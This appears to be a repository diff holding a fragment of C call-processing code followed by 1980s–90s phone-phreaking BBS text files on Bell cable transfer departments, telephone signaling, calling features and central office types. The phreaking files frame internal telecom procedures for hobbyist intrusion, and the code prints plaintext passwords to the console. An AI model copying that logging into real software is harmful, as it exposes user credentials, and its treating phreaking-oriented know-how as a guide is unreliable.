send_l3(NTRELEASE,i,LOCLNET,NODESTOB,"");
callrec[i].cpstate=FINAL;
LX fprintf(COCON,"NEXT STATE: FINAL\n\n"); RX
break;
case LINE_RES:
send_l3(NTRELEASE,i,LOCLNET,RESFAIL,"");
callrec[i].cpstate=FINAL;
LX fprintf(COCON,"NEXT STATE: FINAL\n\n"); RX
break;
default:
if(callrec[i].bch == NOBCH)
callrec[j].bch = NOBCH;
send_l3(NTSETUP,j,l3msg.loca,l3msg.caus,l3msg.usinf);
callrec[i].cpstate=callrec[j].cpstate=SETUP;
LX fprintf(COCON,"NEXT STATE: SETUP\n\n"); RX
break;
} /* end of the switch on j */
break; /* end of case NTSETUP */
case NTFACI:
LX fprintf(COCON,"FACILITY request from L3\n"); RX
LX fprintf(COCON,"Passwd Check: %s\n",&l3msg.usinf[1]); RX
if((j=lopasswd(callrec[i].dn,callrec[i].sapi,&l3msg.usinf[1])) >= 0){
LX fprintf(COCON,"Password validation succeeds\n",i); RX
dnrec[j].module=callrec[i].module;
dnrec[j].line=callrec[i].line;
if(dnrec[j].tei != 127)
dnrec[j].tei=callrec[i].tei;
dnrec[j].rscode=l3msg.usinf[0];
send_l3(NTFACIAK,i,NULL,NULL,"");
LX fprintf(COCON,"NEXT STATE: NULL\n\n"); RX
break;
}
LX fprintf(COCON,"WARNING: Password validation fails\n",i); RX
send_l3(NTFACIRJ,i,LOCUSER,IFACIPAR,"");
LX fprintf(COCON,"NEXT STATE: NULL\n\n"); RX
break; /* end of case NTFACI */
case NTRLCOMP:
LX fprintf(COCON,"RELEASE COMP request from L3\n"); RX
if((j=callrec[i].link) != IDLE){
if(callrec[j].link==i){
send_l3(NTRELEASE,j,l3msg.loca,l3msg.caus,l3msg.usinf);
callrec[j].link= IDLE;
callrec[j].cpstate=FINAL;
}
}
callrec[i].cpstate = NULL;
callrec[i].link = IDLE;
LX fprintf(COCON,"NEXT STATE: NULL\n"); RX
delete(i);
LX fprintf(COCON,"Deallocate Call Record (%d)\n\n",i); RX
break;
case NTALERT:
LX fprintf(COCON,"ALERT request from L3\n"); RX
if((j=search_callrec(callrec[i].module,callrec[i].line,callrec[i].sapi,callrec[i].callref,127,TEION))>=0){
j = sort[j];
callrec[i].bch=callrec[j].bch;
for(k=0;k<=(callrec[j].bcap[0]&255);++k)
callrec[i].bcap[k]=callrec[j].bcap[k];
for(k=0;k<=(callrec[j].lowcomp[0]&255);++k)
callrec[i].lowcomp[k]=callrec[j].lowcomp[k];
for(k=0;k<NUM_DIG;k++){
callrec[i].lnkdn[k]=callrec[j].lnkdn[k];
callrec[i].dn[k]=callrec[j].dn[k];
}
k=callrec[i].link=callrec[j].link;
if(callrec[j].cpstate == SETUP){
send_l3(NTALERT,k,l3msg.loca,l3msg.caus,l3msg.usinf);
callrec[k].cpstate=callrec[j].cpstate=ALERT;
}
callrec[i].cpstate=ALERT;
LX fprintf(COCON,"NEXT STATE: ALERT\n\n"); RX
break;
}
send_l3(NTRELEASE,i,LOCLNET,NORMTR,"");
callrec[i].cpstate=FINAL;
callrec[i].link = IDLE;
LX fprintf(COCON,"NEXT STATE: FINAL\n\n"); RX
break;
case NTCONNE:
LX fprintf(COCON,"CONNECT request from L3\n"); RX
if((j=search_callrec(callrec[i].module,callrec[i].line,callrec[i].sapi,callrec[i].callref,127,TEION))>=0){
callrec[i].bch=callrec[j=sort[j]].bch;
for(k=0;k<=(callrec[j].bcap[0]&255);++k)
callrec[i].bcap[k]=callrec[j].bcap[k];
for(k=0;k<=(callrec[j].lowcomp[0]&255);++k)
callrec[i].lowcomp[k]=callrec[j].lowcomp[k];
for(k=0;k<NUM_DIG;k++){
callrec[i].lnkdn[k]=callrec[j].lnkdn[k];
callrec[i].dn[k]=callrec[j].dn[k];
}
k=callrec[i].link=callrec[j].link;
callrec[k].link = i;
send_l3(NTCONACK,i,l3msg.loca,l3msg.caus,l3msg.usinf);
send_l3(NTCONNE,k,l3msg.loca,l3msg.caus,l3msg.usinf);
if(callrec[i].bch != NOBCH)
send_msp(MSP_CONN,i,j);
delete(j);
LX fprintf(COCON,"Deallocate Call Record (%d)\n",j); RX
callrec[i].cpstate=callrec[k].cpstate=CONNECT;
LX fprintf(COCON,"NEXT STATE: CONNECT\n\n"); RX
break;
}
send_l3(NTRELEASE,i,LOCLNET,NORMTR,l3msg.usinf);
callrec[i].cpstate=FINAL;
callrec[i].link = IDLE;
LX fprintf(COCON,"NEXT STATE: FINAL\n\n"); RX
break;
default:
fprintf(COCON,"ERROR: Unexpected %s msg from L3 (ignored)\n\n",l3msgname[l3msg.cmnd]);
break;
} /* end of the switch on l3msg.cmnd */
break; /* end of case NULL */
case SETUP:
switch(l3msg.cmnd){
case NTCONNE:
LX fprintf(COCON,"CONNECT request from L3\n"); RX
send_l3(NTCONACK,i,l3msg.loca,l3msg.caus,l3msg.usinf);
send_l3(NTCONNE,j=callrec[i].link,l3msg.loca,l3msg.caus,l3msg.usinf);
callrec[j].link = i;
if(callrec[i].bch != NOBCH)
send_msp(MSP_CONN,i,j);
for(j=0;j<127;++j)
if(j!=callrec[i].tei)
if((k=search_callrec(callrec[i].module,callrec[i].line,callrec[i].sapi,callrec[i].callref,j,TEION))>=0){
send_l3(NTRELEASE,k=sort[k],LOCLNET,NORMTR,l3msg.usinf);
callrec[k].cpstate=FINAL;

File diff suppressed because it is too large Load Diff
Binary file not shown.
+200
View File
@@ -0,0 +1,200 @@
SSWC - Bell Research Report (Vol I)
All research gathered, tested and mastered by the original
members of SSWC:
Chance - The Technician - Cellular Phantom
This text will give you an in depth look at some unexplored
technician departments located in the Bell System. As well
as newly discovered equipment and electronic devices used
by Bell Technicians. Note that information in this file is
subject to change. However, we will try to keep you updated
as much as possible.
There are many different types of acronyms used in this text.
You will find a list these acronyms at the end of this file.
We will begin the file by discussing a mechanical/electronic
device used by the Cable Transfer Administration (CTA) known as
a Transfer Switch. This device is specifically used to verify a
working line on both the "from" cable pair and the "to" cable
pair through the backtap, and is transparent to the customer (in
other words the device is unnoticeable to the customer).
Although the Transfer Switch itself is located at the CO, CTA
is responsible for the maintenance and upkeep of the Transfer
Switch.
Next we will discuss a department of Bell known as the
Distribution Service Design Center (DSDC). The Cable Transfer
Representative (this person is a clerk for DSDC), will prepare
the Cable Transfer Schedule and assist the other representatives
in coordinating telephone line repair and completion dates.
The engineering job schedule, service requirement dates, pending
or potential held orders, age of job, etc, will determine the
priority of each scheduled completion date. It is the
responsibility of DSDC Transfer Representatives and Committees
to provide a splicing sequence and resultant fill on an
Engineering Work Order (EWO). The DSDC will determine the number
of "Plain Old Telephone Service" (POTS) circuits and special
and designed services on the EWO. They will help determine if
the rearrangements and changes incorporated in the EWO will
necessitate a design review by the Circuit Provision Center (CPC).
The DSDC will forward to the CPC old and new line makeups for
designed service. The DSDC scheduling engineer is responsible
for reviewing old and new EWOs involving cable, line, or station
rearrangements and for establishing the time needed for job completion. After reviewing old work orders, the DSDC shall
do one of the following:
1. Reschedule the cable, line, or station transfers.
2. Initiate a revision of the transfer so it will be compatible
with existing conditions.
3. Issue a cancellation of the particular transfer in question.
The Circuit Provision Center (CPC) involves cable, line, or
station transfer procedures when it is presented a notification
of a cable transfer and an indication that special services are
involved. The CPC will receive notification from the DSDC that
a circuit change will be required. The notification document
will provide the CPC with:
A. Project number and expected record issue date (RID) and
due date
B. Common language circuit identification (CLCI)
C. Old assignment and makeup
D. New assignment and makeup.
It is the responsibility for The Frame Control Center (FCC)
and affiliated representatives to contact each CO involved in a
cable transfer and will be a member of the Cable Transfer
Committee (CTC), and will attend committee meetings. The CTC
will also make frame cross-connect activity completion
commitments. Placing and removing front-tap connectors, sending
tone, and connecting automatic taggers and Central Work Group
(CWG) talk pairs shall be the responsibility of the FCC.
Upon receiving of either the Exchange Customer Cable Record
(ECCR), Computer Systems for Mainframe Operations (COSMOS)
printouts, or local forms from the Loop Assignment Center (LAC),
the Central Office Work Group (COWG) shall make a verification
and test of the transferring cable counts and resolve all
record problems with the LAC. The COWG will use the following
procedures for verification and test:
1. Verify the telephone number on all working pairs in both
the "from" and "to" counts and check for any vacant pairs not
listed.
2. Test all vacant pairs in the "to" count, using the Go/No-Go
test set or equivalent.
3. Any discrepancy found as determined in (1) or (2) shall be
posted and the forms returned to the LAC on or before the
scheduled completion date for verification and pretest as
shown on the transfer schedule.
Note: Verification and pretests are extremely important in
preventing future service interruptions, unresolved
discrepancies, and cost delays. (In other words this
is done so Bell won't loose a dime of their precious
"millions".
After placing the backtaps, the COWG must validate that the
backtaps are correct and any work or record problems found, will
be corrected by the COWG and forwarded to the LAC for updating
records. In work locations where COSMOS is fully used, the
transfer MUST be stated in COSMOS, when backtaps are placed or
removed, by using the appropriate work code found in the COSMOS
Frame Training Manual.
* Note to the reader: All Bell departments discussed in
in this text work together on a regular basis,
generally when their is a problem with a cable
transfer or with similar related equipment, the
Bell departments will interact with each other in
order to remedy the problem.
This concludes SSWCs Bell Research Report (Vol I).
The information contained in this file is solely
for the use of Phone Phreaks that FULLY understand
what has been discussed. If you do not FULLY
understand what has been discussed in this file,
it is extremely advisable not to attempt to use any
of this information, whereas you could cause an
extreme negative impact on your knowledge as a Phone
Phreak. Have a good time, learn what you can, but
never think you know more than you do. To the
novice this file is all technical BullShit.
However to the Eliteness its much, much more.
GLOSSARY OF ACRONYMS:
CLCI - Common Language Circuit Identification
COSMOS - Computer System for Mainframe Operations
COWG - Central Office Work Group
CPC - Circuit Provision Center
CMC - Construction Management Center
CTA - Cable Transfer Administration
DSDC - Distribution Service Design Center
ECCR - Exchange Customer Cable Record
EWO - Engineering Work Order
FCC - Frame Control Center
LAC - Loop Assignment Center
POTS - Plain Old Telephone Service
RID - Record Issue Date
SSC - Special Service Center
*** SSWC: Were just getting started...

+248
View File
@@ -0,0 +1,248 @@
SSWC - Bell Research Report (Vol II)
All research gathered, tested and mastered by the original
members of SSWC:
Chance - The Technician - Cellular Phantom
SSWC presents our latest text file continuing our discussion
on Bell Operating Departments. Note that information in
this file is subject to change. However, we will try to keep
you updated as much as possible.
We will begin by discussing an important department of Bell,
known as the Maintenance Center (MC) or Special Service Center
(SSC). The MC is responsible for verifying and coordinating the
transfer of special service activities between the Construction
Work Group (CWG) and the Central Office Work Group (COWG). The MC
or SSC will maintain control of all special service transfers.
Note: When using an approved transfer switch, testing of
Plain Old Telephone Service (POTS) services will be
performed by the CWG. The MC need only test services
classified as type "B". (This type of classification
is generally used on the Computer System for Mainframe
Operation (COSMOS) mainframe).
The MC will receive a copy of the cable transfer and associated
work orders from the Loop Assignment Center (LAC) prior to the
scheduled start date of the transfer. They will deal with any
unrecognized problems (such as clearing defective pairs, if
requested by the Distribution Service Design Center (DSDC), and
giving notification of what pairs have been or cannot be cleared)
that would require new pair count assignments.
The MC shall arrange with the CWG, Frame Control Center (FCC),
SSC, and other necessary departments for the transfer of special
and designed services that require release or special handling.
During the transfer of these services, the MC will maintain
communication with all personnel involved in the transfer
activity.
The MC or SSC shall coordinate the release and transfer of
special and designed services designated as "B" services. The time
and date for each service release shall be recorded on the MC copy
of the Special Service Protection List and Defective Pair List.
Note: Time and date of release must be negotiated in advance
of the cable transfer. No work shall be permitted on
service requiring a release until a method of procedure,
including release date and time and personnel required,
has been established by the MC and approved by the
customer and SSC control office responsible for those
services. When the MC receives work of those specific
or out-of-the-ordinary release requirements, the
Construction Management Center (CMC) supervisor, FCC
supervisor, and other necessary work group supervisors
must be notified in advance so they can begin work on
the transfer.
The MC shall test all affected special and designed services
completed by the CWG as the transfer progresses. The CWG need not
wait for verification by the MC, unless problems are encountered.
The CWG will inform the MC of progress. The MC shall have the
authority to stop the transfer procedures at any time if extensive
trouble reports develope. If this occurs, the MC supervisor will
lead an investigating committee to determine the cause of trouble
and to recommend corrective action.
After all work is completed, the MC will issue a final closing
number for the completed transfer. The MC will notify the FCC that
the transfer is complete and will give them the closing number.
The MC will post the Cable Transfer Form as complete and will
forward the transfer, including changes, and Defective Pair List
to the LAC.
We will now discuss the uses of the Cable Transfer Administration
(CTA), and how they operate at a successful level.
The general functions and responsibilities of the CTA work group
is to provide flexibility in the design of the cable network,
existing cable pairs are transferred for one cable count to another
cable count. This is commonly referred to as a cable transfer or
cable throw. The transfer occurs in a splice and involves
disconnecting pairs of wires beyond the splice from one feeder
cable count and reconnecting then to a different feeder count.
The result is that the count of the pairs beyond the splice will
change. The configuration, identification, and possible transferring
of working cable pairs are complex and time-consuming. The work
is further complicated by the many functions required of other
work groups. To ensure that these operations are performed free of
service interruptions and with maximum efficiency, timing and close
coordination among all the work groups involved are mandatory.
The same coordination is required to complete drop wire re-
connections (line transfers). The Cable Transfer Committee (CTC)
is also responsible for organizing this work in a timely manner.
As soon as practical, after the line transfer have been completed,
the old cable should be cut off and removed. (Their is more
hardware work involved in this process, however we regret that
we have not yet been able to fully research and understand what
further hardware applications are used).
In order for the Cable Transfer Committee to obtain a high
degree of transfer efficiency, all committee members must attend
committee meetings on a selective basis and monitor the published
minutes (in other words review information from past meetings).
Higher management will be able to evaluate the effectiveness of
the transfer committee. The number of jobs completed as scheduled
and the ability of the committee to identify problems should be
monitored as a measure of committee success in scheduling and
completing cable transfers.
The use of these procedures will reduce customer trouble reports
and the overall cost of cable and line transfers and will permit
balancing the work force and work load for all groups involved.
By completing cable transfers promptly, in accordance with the
time schedule, changes to transfer sheets will be minimized, the
need for rerunning cables will be reduced, testing cables can be
properly scheduled, and time spent on field work can be shortened.
The errors, frustrations, and probability of cable troubles
associated with delays in this kind of work can be virtually
eliminated.
A Cable Transfer Committee must be established in each network
distribution service/construction district to ensure close
coordination and proper timing of cable, line, or station transfers.
Districts that cover a large service area (having more that one
Loop Assignment Center or Maintenance Center) may require more
than one committee.
When scheduling transfers, consideration must be given to work
tours and peak load periods (busy times of the week) of all work
groups to optimize the continuity of the cable transfer activity.
Consideration must also be given to time required by the CWG
to complete preliminary work, by the LAC to analyze and lay out
the transfer, by the Circuit Provision Center (CPC) to check the
design of special services, by DSDC, Construction Management
Center (CMC), and installation to make the resulting changes, and
by the MC and/or SSC to negotiate with special service customers.
The Cable Transfer Committee must negotiate all completion dates.
The transfer committee chairperson will monitor and take action
on excessive time intervals for all work groups. Transfers that
involve an extremely large number of working circuits may require
scheduling in smaller segments. Transfers should be scheduled to
maintain continuity until wire work is completed. The committee
is responsible for all special scheduling. Offices with
mechanized assignment records such as COSMOS or TIRKS require
more strict scheduling due to transaction restrictions.
Sequence transfers and the reusing of counts cleared on previous
transfers may also require more strict scheduling. Cable
transfers worked via COSMOS must be closely monitored to avoid
long-term storage of cable transfers in the data base.
Long-term storage causes changes for the FCC and CWG, thereby
causing lost time. The committee will make preliminary arrange-
ments for the transfer of special and designed services. The LAC
will provide a list of all special services, by Common Language
Circuit Identification (CLCI), that are in the affected cable
count to the DSDC prior to scheduling the transfer in the firm
period. The DSDC will forward the list to the CPC along with the
new and old cable makeup for the reissuance of new Work Order
Record Detail (WORD - The work authorization and layout card
for designed special services) documents and redesigns, if
necessary.
After the new WORD documents are received, the FCC will bring
the Work Authorization (WA - The first page of the WORD document)
to the CTA committee meetings. The WA copy will contain the work
description and associated notes for the transfer and, most
important, will give the circuit classification code "A" or "B".
Next we will discuss information concerning the Telephone
Outside Plant. This brief discussion will inform you exactly what
path cables take from the CO to the subscribers residence.
This path is as follows:
1 Main Distributing Frame (MDF)
2 Tip Cables
3 Cable Vault
4 CO Manhole
5 Main Conduit
6 Subsidiary Conduit
7 Insulated Joint
8 Main Distributing Terminal (MDT)
9 Riser Cable
10 Distributing Terminal
11 Anchor Guy
12 Aerial Cable Cross Connecting Box
13 Telephone Company Owned Pole
14 Aerial Cable
15 Strand (one cable)
16 Joint Use Pole Electric or Telephone
17 Terminal
18 Splice
19 Electric Wires
20 Urban Wires
21 Dropwire
22 Main U.G. Cable
23 Stub
24 Rear Wall Cable
25 Buried Cable
26 Cribbing
27 Block Pole
After completing this sequence the cables will then run into
the residence, providing telephone service.
* Note to the reader: In order to gain maximum knowledge
from this file, it is suggested that you obtain and
study our first file.
This concludes SSWCs Bell Research Report (Vol II).
The information contained in this file is solely for the
use of Phone Phreaks that FULLY understand what has been
discussed. If you do not FULLY understand what has been
discussed in this file, it is extremely advisable not to
attempt to use any of this information, whereas you
could cause an extreme negative impact on the rest of the
Phreak community. Have a good time, learn what you can,
but never think you know more than you do. To the
novice this file is all technical BullShit. However, to
the experienced Phreak, its much, much more.
* SSWC: The leader in innovative phreaking!

+238
View File
@@ -0,0 +1,238 @@
==)--- P TO PAUSE S TO STOP ---(==
\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`
Basic Signaling, PT I
{C} 1987 Asmodeus Rex OOTR/cDc
Transcribed From 1986 Bell Tech
\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`
This is the start of a sequence of info that someof you may or may now know..
if you know it all, tell me and i will resort to something else..
Basic Signaling
4.1 General
Signaling is the means used to establish and control telephone
calls. It includes signals from terminals (station signaling), to and from
switching centers (register signaling), and also signals between switching
centers (line signaling). Signals are carried by the line and trunk
transmission equipment and the switching system which convay information and
commands to and from the various parts of the system and operating
administration signals.
The modes of signaling which will be summarized include the following
types..
4.1.1 Direct Current Signaling
In the direct current signaling method (loop-disconnect signaling), a
signaling code is derived from the duration and direction of the current
flowing through a loop. This loop includes the customer's telephone and the
line transmission equipment and it's switching center interface. Direce
current loop signaling is also used with trunk transmission equipment of the
wire type.
An alternative methd of direct current signaling uses only one of the
pair of wires and is called leg signaling
4.1.2 Alternating Current Signaling
Alternating current signaling is based on signals of different
frequency either in the same bandwidth (in band) as the speech transmission
path (300 to 3400 Hz) or at a lower, <300 Hz, or at a higher, >3400 Hz,
frequency (out band).
4.1.3 Digital Signals
Digital signals take the form of a series of successive pulses, binary
signals, which are coded to produce a signaling format. Digital signals may
occupy a portion of one of the time slots used for the transmission of speech
(in slot) or may used a dedicated time slot (our slot).
4.1.4 Signaling Path
Signaling may use the same transmission path as the speech or datd
signals or it may use a seperate channel. The first case is called Channel
Associated Signaling, the second case Common Channel Signaling.
Common Channel Signaling. Shows the principle of operating for common
channel signaling. The signalin function for both line and register signaling
is removed from the path carrying the transmission signals. In lieu of this a
series of messages indicating the originating and terminating trunk
identities, together with the relevant address or line signals, is sent over a
seperate dedicated channel. This information is processed in the system
controls at either end and decoded to produce the relevant actions. There are
two such systems in use, or planned for use: CCITT System #6, which uses an
analog signaling in band method by the use of data modems, and CCITT System
#7, which uses pulse code modulation (PCM) coded signals operating at 64,000
BPS.
\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
Basic Signaling Pt II
{C} 1987 Asmodeus Rex - cDc
OOTR/PAWW/MBI/MCI
Transcribed From 1986 Bell
\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
This File Was First Left On P-80, All Credit Of This File Must Be Left to
P-80 When Posted On Other Systems.. - Rexxy
4.1.5 Signalin over a Carrier System
The signaling path may consist of wire conductors or it may be derived
from a carrier system. This provides a dedicated derived channgd from one of
the 'n' inputs to one of the 'n' outputs. It uses either frequency
multiplexing or pulse code modulation to multiplex the channels.
4.1.5.1 Frequency Division Carrier
In the case of frequency division a number of channels are each
allocated a por4ion of the bandwidth of the carrier system. Each portion is
multiplexed with the carrier frequency by thE multiplexing equipment at the
send end. It is demultiplexed and filtered to select the relevant channel at
the recieve end to restore the speech wave form.
4.1.5.2 Pulse Code Modulation Carrier
In the case of pulse code modulation a number of channels are each
allocated a time slot which has a fixed recurring position in a frame of time
slots. The analog input to each channel is sampled and coded at the send side
and interleaved with the other time slots by the multiplexing equip. The
channel is extracted at the receive en$ and demultiplexed back to analog.
Signaling systems are designed for the various transmission modes and
means.
4.2 Station Signaling
Station signaling controls the transmission path between the terminal
and the exchange and provides address information. It is used for the duration
of th call. Address signaling is used to set the call up and to initiate
certain kinds of services, some of which are described later on..
4.2.1 Signals From Telephone
Present-day telephones have the following signaling elements.
o A hook switch which completes the loop circut when the telephone
handset is lifted. This is used to originate or answer a call.
Replacement of the handset opens the loop and terminates the call.
o A calling device, which is either a rotary dial or a key pad. to
produce the address signals, henceforth the station signals
address information to the switching system center register
using either dial pulses or DTMF pulses.
o An alerting device, usually a bell, to indicate a call terminating
on the line.
4.2.1.1 Rotary Dial
The calling device which is in most common us% as The rotary dial. The
rotary dial produces dial pulse (loop disconnect) signals.
This calling arangement uses the standard telephone dial. rotary type,
usuallt having a pulsating rate of 10 impulses per second. (IPS). However, 20
IPS dials are used in certain countrys. Dial pulsing utilizes a train of one
to 10 pulses, each pulse consisting of a momentary opening of the signaling
loop. The digit to be dialed is selected by rotating the dial manualy to the #
selected and releasing the dial produces a requisite pulse train.
The loop disconnect signals in general use, these include switch hook
or equivalant signals.
4.2.1.2 Loop-Disconnect Station Signaling
A calling line originates a call by a request for service signal which
)s produced when the telephone handset is removed. This signal is detected by
the line circut which associates a callin' device detector and a register.
Dial tone is returned to the caller, who then dials the address of the
requested party. The register stores the dialed units and hence accumulates
the address information. The line circut register and calling device deteator
respond to the following loop-disconnect signals.
'Closed Loop Signals' These can indicate a request for service or the
end of a train of digits. IN the first use the signal must persist for a
minimum of 10Msec. A signal occuring after request for service must persist
for a minimum of 180Msec. duration to be recognized as the end of a series of
pulses corresponding to a digit. (Interdigit Signal).
If the signal occurs after all digits have been recieved then it is a
control signal.
'Open Loop Signals' An open-loop signal can either be the beginning of
a dial pulse or at the beginning of a disconnect or 'hook-switch flash'
signal. If the signal is the begining of a dial pulse it will be followed by a
closed loop condition within 180 Msec. If the signal is the beginning of a
"hook switch flash" it will be follwed by a closed loop condition within 1 or
2 seconds. Services using "hook-switch flash" are those services which require
the connection of functional units to an established call without
disconnecting the established connection. Hence, depending on the class of
service of the caller, a sustained open-loop condition which occurs after a
closed loop must last longer than 180 Msec or 2 Sec to be recognized as a
disconnect signal..
\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`
Basic Signaling - Pt III
{C} 1987 Asmodeus Rex - cDc/OOTR
AEUA/MCI/MBI/PAWW
Transcribed From 1986 Bell
\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`
4.2.1.3 Tone Signaling from Station
The advent of low-cost electronic components has made the use of
key-controlled oscillators as calling devices feasible. The generic term is
'Dual Tone Multi Frequency' (DTMF). This calling device has push-button keys
on the telephone innstruments which transmit two frequencies when one key is
pressed. Signals are those developed by the 'Bell System' for tuch-tone
service, which is a registerd trademark of Western Electric Co.
Key plates in normal use have only 10 or 12 of the 16 possible keys,
but some systems should be capable of responding to all 16 codes for future
applications.
4.2.1.4
Registers serving lines are designed to respond to either dial pulses
or DTMF signals. This uses serarate process for dial pulse and DTMF but the
resulting digit (whether it was determined by counting pulses or decoding
voice frequency signals) is coded in the system code (usually binary-coded
decimal) and stored.
4.2.1.5 Binary Coded Decimal
This coding method uses for bits per decimal digit. The first ten of
the 15 possible combinations are used. The four bits have the most significant
bit value (eight) on the left hand side and numbers are coded by summing the
bit values; EX: Decimal value 1 is coded as 0001 and decimal value 10 is coded
1010. This method, which separately codes each decimal digit, has advantages
in analyzing the digits dialed by th caller and relating them to the numbering
plan.
4.2.2 Signals To Telephones
The signals to the telephone of the calling party consist of tone
signals, or messages, to the caller. These direct the caller's actions or
advise him or her of the progress of the call. The frequencies and cadences if
these tones may vary from country to country, but the CCITT is recommending
the use of standard tones. This has become increasingly important with the
introduction of direct international dialing. Inaddition to this there are
signals which alert a caller customer. Another signal informs a customer that
the telephone handset has been left of the hook, without dialing, for a
predertimed period.
Call These BBS's
[The Alcazar Elite..............................................401/789-0094]
[Sanctuary North Private........................................507/288-9572]
Downloaded from P-80 Systems.....
Originally Displayed on P-80 Systems.
File diff suppressed because it is too large Load Diff
+58
View File
@@ -0,0 +1,58 @@
--------------------------------------------------------------------
- Max Presents..... -
- -
- Southwestern Bell's -
- Call Control Options -
- -
- DATE:05/14/91 TIME:8:03 PM -
- -
--------------------------------------------------------------------
Call Control Options offer customers a new tool to deal with the hectic
pace of modern life. Following is a brieg description of the services.
* Call Return: By pressing *69, (1169 on rotary dials), customers can
return the last local incoming call. This service means fewer mad
dashes from the shower to answer a ringing phone before the caller
hangs up.
* Call Cue: By pressing *66, (1166 on rotary dials), customers can
avoid getting repeated busy signals. Busy local numbers are redialed
as many times at it takes to get an answer, for as long as 30 minutes.
A special ring is the cue when the line is free. Call Cue allows
customers to perform other activities while their phone monitors their
line for them.
* Priority Call: By pressing *61, (1161 on rotary dials), customers
can confidently answer--or ignore--their ringing phones. A special
ring tells them when a call they want is coming through. (Three local
numbers can be designated as priority.) Less important calls can wait
for a better time.
* Call Blocker: By pressing *60, (1160 on rotary dials), customers can
avoid inconvenient--and even unwelcome--calls. As many as three local
numbers can be blocked at any given time (except in Missouri, where
six numbers are blocked).
* Call Trace: By pressing *57, (1157 on rotary dials), customers can
gain a new defense against harassing calls. That step initiates a trace
of most local calls and customers may request that the calling number,
date and time be given to law enforcement officials for further
investigation.
* Selective Call Forwarding: (Only available in selected Oklahoma
exchanges.) By pressing *63, (1163 on rotary dials), up to three numbers
can be selected for forwarding to another telephone number. Only these
calls will get through to the designated number.
-me
Taken from "This Week" December 6, 1990.
CompuFix BBS
(806)745-1938
300/1200/2400
24 hrs. 7 days
-For all your software & hardware needs. Give us a call.Special Membership
discounts!
+115
View File
@@ -0,0 +1,115 @@
==)--- P TO PAUSE S TO STOP ---(==
%===========================================================================
. A look at Central Offices
. By Doctor Zerox, David Johns and GJC
===========================================================================
. The Central Office is "A place where the switching of telephone calls
is done, whether automatic or manual." What is "automatic", and are there
different types of automatic Central Offices? Automatic means "Acting or
operating in a manner essentially independant of external influence or
control...Self regulating."
. There are many types and basic theories of Central Office design and
operator. However, all Central Offices are Automatic today, and therefore can
standalone and conduct intraoffice (within the same Central Office
building or machine) calls without being connected to the rest of the
world.
. As technology advances, even the oldest offices may have Custom Calling
Features thus allowing Call Forwarding or possible can provide DID trunks,
even though one thinks only modern Electronic Switching Systems (ESS) can
provide these desired TAS features.
. If the CO looses connection with the outside world by having the toll
cable or facility interruped, one can still make and receive calls within his
own exchange. Calls between towns or sections of town served by a separate
CO building would cease until the repairs of the cable or facility were
complete, but service will continue internalls. That is why the CO is
called Automatic. Some COs are "Remote" or "Slave" Central office, which are a
part of the host CO, usually digital, and have some limited intraoffice call
capabilities when the host's cable is cut.
. There are three basic types of Central Offices: Mechanical, Electronic
and Digital. In most areas of the telephone field, people only feel there
are two types; Mechanical and Electronic, and consider two subgroups
under the Electronic heading as: 1 - Space division, and 2 - Time division.
In reality, these are really two different technologies completely.
. A Mechanical CO would be a Step-by-Step (SXS), a Crossbar (XBar),
a X-Y (like a Step-by-Step), or a Panel Office. There are all totally relay
driven, and are what I will call "hardwired" devices. You build them in
a specific order and with a set pattern in mind as to othe numbers that can be
dialed, the trunks that can be connected to a caller and the features
that a station user has. No special bells and whistles are allowed without
MAJOR modifications to the CO equipment (COE).
. In the Electronic and Digital COs, one can reconfigure the entire CO
in a matter of minutes with the aid of the computer that runs the CO
equipment. Flexiblity is the advantage, and any sort of fancy feature can now
be given to the station user an a per telephone line basis, as well as having
flexibility in the trunks and connections to the outside world, with
little-to-no rewiring of the COE. Most changes are controlled by the computer
Common Control Center in the machine.
. The Electronic Central office as we know them today are the ESS #1, ESS
#2, and the ESS #3 that are used on a Class 5 (End office where calls
originate and terminate to telephones) basis.
. There are many different ways that a traditional ESS works, but they
are all basically a computer center controlling a crosspoint or reed relay
matrix that connect the call in the desired route. The caller and the
called parties are literally connected together via some sort of
crossconnection similar to that in a Crossbar office, but done by the
processor control in the ESS office. Therefore and Electronic office IS a
Mechanical office, but with a fancy computer controller at its heart.
. Many people think that an Electronic office, like the ESS #1 is
ALL electronic and contains NO mechanical connections, which is NOT
ture. With a computerized front end (commonly called the "Poorman's ESS")
you can actually convert a Step-by-Step, Panel, or Crossbar CO
into looking just like and ESS #1, from the station user's point of view. There
are devices on the market today that do just that, convert older fully
mechanical offices to semi-ESS, thus allowing the Company to provide the
user with ESS like features.
. The Digital Central Office is totally differnt from the traditional
ESS CO. The digital CO has NO mechanical connections between the
caller and the called parties. Your voice is converted from Analog to
Digital, connected digitally and then converted back again to Analog.
. In the Digital CO a techinque called "Time Division Multiplex" or TDM
for short, is used for the connection of the Analog voice to the one single
transmission path or highway in the system. In the ESS offices, there are
paths or highways for calls to occur at the same time. If Joe calls P-80, they
may be using path 156 in the ESS, while Sam and Mary use path 110, etc. In the
digital CO, ALL people use the SAME path or highway, just a different time
from the other conversation. Thus Joe and P-80 may be in "timeslot #23" while
Sam and Mary may be in "timeslot #11", etc.
. The Western Electric ESS #101, #4E, and ESS #5 are all digital Central
Offices. There are other manufacturers that also make compatable digital COs.
These offices provide all the same features and conveniences (plus more)
as the ESS mechanical COs, such as the ESS #1 or #3.
. The oldest ond most mechanical CO is the Step-by-Step or the "Strowger"
switch. We might say that this dialing mode is a "direct progressive control
system" so as fast as the caller dials, is as fast as the call progresses
through the CO. These Step-by-Step (SXS) offices are virtually foolproof.
If a section of an office was hit with a cannon, chances are the rest of the
office would continue working.
. Once an SXS CO is wired, it is cast in concrete, as to the routing of
calls, the number given to the Line Equipment connectors, and the way calls
